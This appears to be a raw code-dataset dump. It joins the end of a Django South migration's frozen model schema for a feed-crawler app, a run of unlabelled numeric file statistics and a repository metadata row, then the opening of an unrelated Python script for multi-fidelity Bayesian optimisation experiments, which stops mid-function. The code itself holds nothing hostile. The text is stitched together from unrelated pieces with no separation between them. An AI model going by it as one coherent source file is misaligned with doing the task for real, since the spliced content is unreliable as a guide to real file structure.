'parent': ('mptt.fields.TreeForeignKey', [], {'blank': 'True', 'related_name': "'subchannel'", 'null': 'True', 'to': u"orm['channels.Channel']"}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
u'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'show_in_menu': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'to': u"orm['sites.Site']"}),
'site_domain': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'site_iid': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True', 'max_length': '4', 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '150'}),
u'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['%s.%s']" % (User._meta.app_label, User._meta.object_name)})
},
u'containers.container': {
'Meta': {'ordering': "['-date_available']", 'unique_together': "(('site', 'child_class', 'channel_long_slug', 'slug'),)", 'object_name': 'Container'},
'channel': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['channels.Channel']"}),
'channel_long_slug': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '250', 'null': 'True', 'blank': 'True'}),
'channel_name': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '140', 'null': 'True', 'blank': 'True'}),
'child_app_label': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '30', 'null': 'True', 'blank': 'True'}),
'child_class': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '30', 'null': 'True', 'blank': 'True'}),
'child_module': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '120', 'null': 'True', 'blank': 'True'}),
'date_available': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'date_insert': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_update': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'hat': ('django.db.models.fields.CharField', [], {'max_length': '140', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'images': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['images.Image']", 'null': 'True', 'through': u"orm['containers.ContainerImage']", 'blank': 'True'}),
'main_image': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'containers_container_mainimage'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['images.Image']"}),
'main_image_caption': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'polymorphic_ctype': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'polymorphic_containers.container_set'", 'null': 'True', 'to': u"orm['contenttypes.ContentType']"}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'show_on_root_channel': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'to': u"orm['sites.Site']"}),
'site_domain': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'site_iid': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True', 'max_length': '4', 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '150'}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'tags': ('django.db.models.fields.CharField', [], {'max_length': '4000', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '140', 'db_index': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['%s.%s']" % (User._meta.app_label, User._meta.object_name)})
},
u'containers.containerimage': {
'Meta': {'ordering': "('order',)", 'object_name': 'ContainerImage'},
'caption': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'container': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['containers.Container']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['images.Image']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'order': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'feedcrawler.entry': {
'Meta': {'ordering': "['-entry_published_time']", 'object_name': 'Entry', '_ormbases': [u'containers.Container']},
u'container_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['containers.Container']", 'unique': 'True', 'primary_key': 'True'}),
'entry_category': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'entry_category_code': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'entry_content': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'entry_description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'entry_feed': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feedcrawler.Feed']"}),
'entry_json': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'entry_link': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'entry_published_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'entry_pulled_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'entry_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'post_created': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'feedcrawler.feed': {
'Meta': {'ordering': "['title']", 'object_name': 'Feed'},
'channel': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['channels.Channel']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'date_available': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'date_insert': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_update': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'feed_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feedcrawler.FeedType']"}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feedcrawler.Group']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_polled_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'link': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'main_image': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'feed_image'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['images.Image']"}),
'max_entries': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'publish_entries': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'published_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'to': u"orm['sites.Site']"}),
'site_domain': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'site_iid': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True', 'max_length': '4', 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '150'}),
'source_json_params': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'source_password': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'source_port': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'source_root_folder': ('django.db.models.fields.CharField', [], {'default': "'/'", 'max_length': '255'}),
'source_url': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'source_username': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['%s.%s']" % (User._meta.app_label, User._meta.object_name)})
},
u'feedcrawler.feedtype': {
'Meta': {'object_name': 'FeedType'},
'actions': ('django.db.models.fields.CharField', [], {'default': "'opps.feedcrawler.actions.rss.RSSActions'", 'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'processor': ('django.db.models.fields.CharField', [], {'default': "'opps.feedcrawler.processors.rss.RSSProcessor'", 'max_length': '255'})
},
u'feedcrawler.group': {
'Meta': {'ordering': "['name']", 'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '250'})
},
u'feedcrawler.processlog': {
'Meta': {'object_name': 'ProcessLog'},
'feed': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feedcrawler.Feed']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'log_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now_add': 'True', 'blank': 'True'}),
'text': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
u'images.image': {
'Meta': {'object_name': 'Image'},
'archive': ('django.db.models.fields.files.FileField', [], {'max_length': '255'}),
'crop_example': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'crop_x1': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'crop_x2': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'crop_y1': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'crop_y2': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'date_available': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'date_insert': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_update': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'fit_in': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'flip': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'flop': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'halign': ('django.db.models.fields.CharField', [], {'default': 'False', 'max_length': '6', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'to': u"orm['sites.Site']"}),
'site_domain': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'site_iid': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True', 'max_length': '4', 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '150'}),
'smart': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'tags': ('django.db.models.fields.CharField', [], {'max_length': '4000', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '140', 'db_index': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['%s.%s']" % (User._meta.app_label, User._meta.object_name)}),
'valign': ('django.db.models.fields.CharField', [], {'default': 'False', 'max_length': '6', 'null': 'True', 'blank': 'True'})
},
u'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['feedcrawler']
| 88.139073
| 227
| 0.591517
| 3,003
| 26,618
| 5.108225
| 0.067266
| 0.101695
| 0.177053
| 0.252934
| 0.848827
| 0.81558
| 0.790026
| 0.749283
| 0.707301
| 0.679791
| 0
| 0.011089
| 0.16996
| 26,618
| 302
| 228
| 88.139073
| 0.683217
| 0.00958
| 0
| 0.241758
| 0
| 0
| 0.548535
| 0.303848
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007326
| false
| 0.007326
| 0.018315
| 0
| 0.040293
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
03b4321599e0767f910928d2ad79b5a822db6bb2
| 48,342
|
py
|
Python
|
main.py
|
shib0li/BMBO-DARN
|
68f889ac8a1a2051754920fabff9e56f667b1cab
|
[
"MIT"
] | 4
|
2021-11-10T19:50:53.000Z
|
2022-03-21T15:13:42.000Z
|
main.py
|
shib0li/BMBO-DARN
|
68f889ac8a1a2051754920fabff9e56f667b1cab
|
[
"MIT"
] | null | null | null |
main.py
|
shib0li/BMBO-DARN
|
68f889ac8a1a2051754920fabff9e56f667b1cab
|
[
"MIT"
] | null | null | null |
import fire
import numpy as np
import torch
import os
import pickle5 as pickle
import subprocess
from datetime import datetime
from time import time
import hamiltorch
# import logging
# import ExpConfigs as exp_configs
# import Misc as misc
# import data.Dataset as Dataset
# import data.Functions as functions
from utils import ExpConfigs as exp_configs
from utils import Misc as misc
from data import Dataset as Dataset
from functionals import Functions as functions
# from baselines import SMAC3
# from baselines import SMAC4
# from baselines import Hyperband
# from baselines import BOHB
# from baselines import SHPO
# import Hamilton as hamilton
from core import Model
from core import Inference
from core import BayesOpt
from tqdm.auto import trange, tqdm
MF_DNN_APPROACH = ['dnn_mf_bo']
SINGLE_BASED_APPROACH = ['mf_hmc_cs', 'mf_hmc_ucs', 'mf_hmc_fix_low', 'mf_hmc_fix_high']
PAR_HMC_BASED_APPROACH = ['par_hmc_cs', 'par_hmc_ucs']
BATCH_HMC_BASED_APPROACH = ['ratio_batch_hmc_cs', 'ratio_batch_hmc_ucs', 'bound_ratio_batch_hmc_cs']
AO_HMC_BASED_APPROACH = ['ao_batch_hmc_cs', 'ao_batch_hmc_ucs']
RANDOM_APPROACH = ['full_random']
MF_GP_BASED_APPROACH = ['mf_gp_ucb', 'mf_mes', 'par_mf_mes']
SMAC_APPROACH = ['smac', 'gp_kernel', 'hyperband', 'bohb']
MT_APPROACH = ['mtbo']
GP_TS_APPROACH = ['gp_ts']
def create_path(path):
try:
if not os.path.exists(path):
os.makedirs(path, exist_ok=True)
#
print("Directory '%s' created successfully" % (path))
except OSError as error:
print("Directory '%s' can not be created" % (path))
#
def parse_exp_configs(kwargs):
configs = {}
opt_config = exp_configs.default_optimization_config()
opt_config._parse(kwargs)
domain_config = exp_configs.default_domain_config()
domain_config._parse(kwargs)
configs['opt_config'] = opt_config
configs['domain_config'] = domain_config
all_methods = MF_DNN_APPROACH + SINGLE_BASED_APPROACH + PAR_HMC_BASED_APPROACH + BATCH_HMC_BASED_APPROACH +\
RANDOM_APPROACH + MF_GP_BASED_APPROACH + SMAC_APPROACH + MT_APPROACH + GP_TS_APPROACH +\
AO_HMC_BASED_APPROACH
sampling_methods = MF_DNN_APPROACH + SINGLE_BASED_APPROACH + PAR_HMC_BASED_APPROACH + BATCH_HMC_BASED_APPROACH +\
RANDOM_APPROACH + AO_HMC_BASED_APPROACH
if opt_config.algorithm_name not in all_methods:
raise Exception("ERROR: "+opt_config.algorithm_name+" NOT implemented.")
if opt_config.algorithm_name in sampling_methods:
hmc_sampler_config = exp_configs.default_hmc_sampler_config()
hmc_sampler_config._parse(kwargs)
configs['hmc_config'] = hmc_sampler_config
#
method_config = None
mf_nn_surrogate_config = None
if opt_config.algorithm_name in SINGLE_BASED_APPROACH:
#
method_config = exp_configs.default_mf_hmc_single_config()
mf_nn_surrogate_config = exp_configs.default_mf_nn_surrogate_config()
method_config._parse(kwargs)
mf_nn_surrogate_config._parse(kwargs)
#
elif opt_config.algorithm_name in RANDOM_APPROACH:
#
method_config = exp_configs.default_mf_hmc_single_config()
mf_nn_surrogate_config = exp_configs.default_mf_nn_surrogate_config()
method_config._parse(kwargs)
mf_nn_surrogate_config._parse(kwargs)
#
if opt_config.algorithm_name in MF_DNN_APPROACH:
#
method_config = exp_configs.default_mf_hmc_single_config()
mf_nn_surrogate_config = exp_configs.default_mf_nn_surrogate_config()
method_config._parse(kwargs)
mf_nn_surrogate_config._parse(kwargs)
#
elif opt_config.algorithm_name in PAR_HMC_BASED_APPROACH:
#
method_config = exp_configs.default_mf_hmc_parallel_config()
mf_nn_surrogate_config = exp_configs.default_mf_nn_surrogate_config()
method_config._parse(kwargs)
mf_nn_surrogate_config._parse(kwargs)
#
elif opt_config.algorithm_name in BATCH_HMC_BASED_APPROACH:
#
method_config = exp_configs.default_mf_hmc_batch_config()
mf_nn_surrogate_config = exp_configs.default_mf_nn_surrogate_config()
method_config._parse(kwargs)
mf_nn_surrogate_config._parse(kwargs)
#
elif opt_config.algorithm_name in AO_HMC_BASED_APPROACH:
#
method_config = exp_configs.default_mf_hmc_batch_config()
mf_nn_surrogate_config = exp_configs.default_mf_nn_surrogate_config()
method_config._parse(kwargs)
mf_nn_surrogate_config._parse(kwargs)
#
# elif opt_config.algorithm_name in RAND_HMC_BASED_APPROACH:
# #
# method_config = exp_configs.default_mf_hmc_random_config()
# mf_nn_surrogate_config = exp_configs.default_mf_nn_surrogate_config()
# method_config._parse(kwargs)
# mf_nn_surrogate_config._parse(kwargs)
# #
elif opt_config.algorithm_name in MT_APPROACH:
method_config = exp_configs.default_mtbo_config()
method_config._parse(kwargs)
mf_nn_surrogate_config = exp_configs.default_mf_nn_surrogate_config()
#
configs['method_config'] = method_config
configs['mf_nn_surrogate_config'] = mf_nn_surrogate_config
return configs
def experiment_mf_dnn(dataset, method_config, mf_nn_surrogate_config, hmc_sampler_config, horizon, res_path, trial_id):
layers = misc.seq_auto_regressive_layers(
dataset.in_dim, dataset.out_dim,
mf_nn_surrogate_config.hidden_depths,
mf_nn_surrogate_config.hidden_widths,
)
sampling = {
'step_size':hmc_sampler_config.step_size,
'L':hmc_sampler_config.L,
'burn':hmc_sampler_config.burn,
'Ns':hmc_sampler_config.Ns
}
res = {}
res['hist_argm'] = []
res['hist_argx'] = []
res['hist_yq'] = []
res['hist_y_ground'] = []
res['hist_config'] = []
res['hist_t_fit'] = []
res['hist_t_acq'] = []
res['hist_t_query_m'] = []
res['hist_t_query_h'] = []
pickle_name = os.path.join(res_path, 'trial'+str(trial_id)+'.pickle')
log_file_name = os.path.join(res_path, 'logs_trial'+str(trial_id)+'.txt')
logger = open(log_file_name, 'w+')
logger.write('===============================================\n')
logger.write(' Experiment with DNN-MFBO \n')
logger.write('===============================================\n')
logger.write('Experiment start at: '+datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
logger.flush()
exp_t_start = time()
for t in trange(horizon, desc='experiment', leave=True):
t_trial_start = time()
model = Model.SeqAutoRegressive(layers, mf_nn_surrogate_config.activation,
torch.device(mf_nn_surrogate_config.surrogate_placement))
hamil_opt = BayesOpt.HamilBayesOpt(model, dataset, sampling)
hmc_samples = hamil_opt.fit(constraint=False)
t_fit = time()
argm, argx = hamil_opt.info_gain_step(hmc_samples)
t_acq = time()
np_argm = argm.data.cpu().numpy()
np_argx = argx.data.cpu().numpy()
#yq, y_ground, success, t_query_m, t_query_h = dataset.add(np_argx, np_argm, scaled_input=True)
yq, y_ground, success, config, t_query_m, t_query_h = dataset.add_interpret(np_argx, np_argm, scaled_input=True)
t_query = time()
if success:
res['hist_argm'].append(np_argm)
res['hist_argx'].append(np_argx)
res['hist_yq'].append(yq)
res['hist_y_ground'].append(y_ground)
res['hist_config'].append(config)
res['hist_t_fit'].append(t_fit-t_trial_start)
res['hist_t_acq'].append(t_acq-t_fit)
res['hist_t_query_m'].append(t_query_m)
res['hist_t_query_h'].append(t_query_h)
logger.write('* Optimization step'+str(t+1)+' finished at ' + datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
logger.write(' - argm = '+str(np_argm)+'\n')
logger.write(' - argx = '+np.array2string(np_argx)+'\n')
logger.write(' - t_fit_surrogate = '+str(t_fit-t_trial_start)+' secs\n')
logger.write(' - t_acq = '+str(t_acq-t_fit)+' secs\n')
logger.write(' - t_query_m = '+str(t_query_m)+' secs\n')
logger.write(' - t_query_h = '+str(t_query_h)+' secs\n')
logger.write(' - t_query = '+str(t_query-t_acq)+' secs\n')
logger.write(' - total_elapsed = '+str(t_query-exp_t_start)+' secs\n')
logger.flush()
else:
logger.write('* Optimization step'+str(t+1)+' FAILED at ' + datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
logger.write(' - argm = '+str(np_argm)+'\n')
logger.write(' - argx = '+np.array2string(np_argx)+'\n')
logger.flush()
with open(pickle_name, 'wb') as handle:
pickle.dump(res, handle, protocol=pickle.HIGHEST_PROTOCOL)
#
#
logger.close()
def experiment_single_hmc(dataset, method_config, mf_nn_surrogate_config, hmc_sampler_config, horizon, res_path, trial_id):
layers = misc.full_auto_regressive_layers(
dataset.in_dim, dataset.out_dim,
mf_nn_surrogate_config.hidden_depths,
mf_nn_surrogate_config.hidden_widths,
)
sampling = {
'step_size':hmc_sampler_config.step_size,
'L':hmc_sampler_config.L,
'burn':hmc_sampler_config.burn,
'Ns':hmc_sampler_config.Ns
}
res = {}
res['hist_argm'] = []
res['hist_argx'] = []
res['hist_yq'] = []
res['hist_y_ground'] = []
res['hist_config'] = []
res['hist_t_fit'] = []
res['hist_t_acq'] = []
res['hist_t_query_m'] = []
res['hist_t_query_h'] = []
pickle_name = os.path.join(res_path, 'trial'+str(trial_id)+'.pickle')
log_file_name = os.path.join(res_path, 'logs_trial'+str(trial_id)+'.txt')
logger = open(log_file_name, 'w+')
logger.write('===============================================\n')
logger.write(' Experiment with Single-Constrained \n')
logger.write('===============================================\n')
logger.write('Experiment start at: '+datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
logger.flush()
exp_t_start = time()
for t in trange(horizon, desc='experiment', leave=True):
t_trial_start = time()
model = Model.FullAutoRegressive(layers, mf_nn_surrogate_config.activation,
torch.device(mf_nn_surrogate_config.surrogate_placement))
hamil_opt = BayesOpt.HamilBayesOpt(model, dataset, sampling)
hmc_samples = hamil_opt.fit(constraint=method_config.constraint)
t_fit = time()
if method_config.fixed_fidelity is not None:
argm, argx = hamil_opt.fixed_fidelity_step(hmc_samples, method_config.fixed_fidelity)
np_argm = argm
else:
argm, argx = hamil_opt.info_gain_step(hmc_samples)
np_argm = argm.data.cpu().numpy()
#
np_argx = argx.data.cpu().numpy()
t_acq = time()
#yq, y_ground, success = dataset.add(np_argx, np_argm, scaled_input=True)
yq, y_ground, success, config, t_query_m, t_query_h = dataset.add_interpret(np_argx, np_argm, scaled_input=True)
t_query = time()
if success:
res['hist_argm'].append(np_argm)
res['hist_argx'].append(np_argx)
res['hist_yq'].append(yq)
res['hist_y_ground'].append(y_ground)
res['hist_config'].append(config)
res['hist_t_fit'].append(t_fit-t_trial_start)
res['hist_t_acq'].append(t_acq-t_fit)
res['hist_t_query_m'].append(t_query_m)
res['hist_t_query_h'].append(t_query_h)
logger.write('* Optimization step'+str(t+1)+' finished at ' + datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
logger.write(' - argm = '+str(np_argm)+'\n')
logger.write(' - argx = '+np.array2string(np_argx)+'\n')
logger.write(' - t_fit_surrogate = '+str(t_fit-t_trial_start)+' secs\n')
logger.write(' - t_acq = '+str(t_acq-t_fit)+' secs\n')
logger.write(' - t_query_m = '+str(t_query_m)+' secs\n')
logger.write(' - t_query_h = '+str(t_query_h)+' secs\n')
logger.write(' - t_query = '+str(t_query-t_acq)+' secs\n')
logger.write(' - total_elapsed = '+str(t_query-exp_t_start)+' secs\n')
logger.flush()
else:
logger.write('* Optimization step'+str(t+1)+' FAILED at ' + datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
logger.write(' - argm = '+str(np_argm)+'\n')
logger.write(' - argx = '+np.array2string(np_argx)+'\n')
logger.flush()
with open(pickle_name, 'wb') as handle:
pickle.dump(res, handle, protocol=pickle.HIGHEST_PROTOCOL)
#
#
logger.close()
def experiment_random(dataset, method_config, mf_nn_surrogate_config, hmc_sampler_config, horizon, res_path, trial_id):
#print('Random searching heuristics')
layers = misc.full_auto_regressive_layers(
dataset.in_dim, dataset.out_dim,
mf_nn_surrogate_config.hidden_depths,
mf_nn_surrogate_config.hidden_widths,
)
sampling = {
'step_size':hmc_sampler_config.step_size,
'L':hmc_sampler_config.L,
'burn':hmc_sampler_config.burn,
'Ns':hmc_sampler_config.Ns
}
res = {}
res['hist_argm'] = []
res['hist_argx'] = []
res['hist_yq'] = []
res['hist_y_ground'] = []
res['hist_config'] = []
res['hist_t_fit'] = []
res['hist_t_acq'] = []
res['hist_t_query_m'] = []
res['hist_t_query_h'] = []
pickle_name = os.path.join(res_path, 'trial'+str(trial_id)+'.pickle')
log_file_name = os.path.join(res_path, 'logs_trial'+str(trial_id)+'.txt')
logger = open(log_file_name, 'w+')
logger.write('===============================================\n')
logger.write(' Experiment with Full-Random \n')
logger.write('===============================================\n')
logger.write('Experiment start at: '+datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
logger.flush()
exp_t_start = time()
for t in trange(horizon, desc='experiment', leave=True):
t_trial_start = time()
model = Model.FullAutoRegressive(layers, mf_nn_surrogate_config.activation,
torch.device(mf_nn_surrogate_config.surrogate_placement))
hamil_opt = BayesOpt.HamilBayesOpt(model, dataset, sampling)
hmc_samples = hamil_opt.fit(constraint=method_config.constraint)
t_fit = time()
np_argm = np.random.randint(0, model.M)
np_argx = misc.generate_random_inputs(1, dataset.in_dim, dataset.lb, dataset.ub, seed=np.random.randint(0,100000))
t_acq = time()
#yq, y_ground, success, t_query_m, t_query_h = dataset.add(np_argx, np_argm, scaled_input=False)
yq, y_ground, success, config, t_query_m, t_query_h = dataset.add_interpret(np_argx, np_argm, scaled_input=False)
t_query = time()
if success:
res['hist_argm'].append(np_argm)
res['hist_argx'].append(np_argx)
res['hist_yq'].append(yq)
res['hist_y_ground'].append(y_ground)
res['hist_config'].append(config)
res['hist_t_fit'].append(t_fit-t_trial_start)
res['hist_t_acq'].append(t_acq-t_fit)
res['hist_t_query_m'].append(t_query_m)
res['hist_t_query_h'].append(t_query_h)
logger.write('* Optimization step'+str(t+1)+' finished at ' + datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
logger.write(' - argm = '+str(np_argm)+'\n')
logger.write(' - argx = '+np.array2string(np_argx)+'\n')
logger.write(' - t_fit_surrogate = '+str(t_fit-t_trial_start)+' secs\n')
logger.write(' - t_acq = '+str(t_acq-t_fit)+' secs\n')
logger.write(' - t_query_m = '+str(t_query_m)+' secs\n')
logger.write(' - t_query_h = '+str(t_query_h)+' secs\n')
logger.write(' - t_query = '+str(t_query-t_acq)+' secs\n')
logger.write(' - total_elapsed = '+str(t_query-exp_t_start)+' secs\n')
logger.flush()
else:
logger.write('* Optimization step'+str(t+1)+' FAILED at ' + datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
logger.write(' - argm = '+str(np_argm)+'\n')
logger.write(' - argx = '+np.array2string(np_argx)+'\n')
logger.flush()
with open(pickle_name, 'wb') as handle:
pickle.dump(res, handle, protocol=pickle.HIGHEST_PROTOCOL)
#
#
logger.close()
def experiment_par_hmc(dataset, method_config, mf_nn_surrogate_config, hmc_sampler_config, horizon, res_path, trial_id):
layers = misc.full_auto_regressive_layers(
dataset.in_dim, dataset.out_dim,
mf_nn_surrogate_config.hidden_depths,
mf_nn_surrogate_config.hidden_widths,
)
sampling = {
'step_size':hmc_sampler_config.step_size,
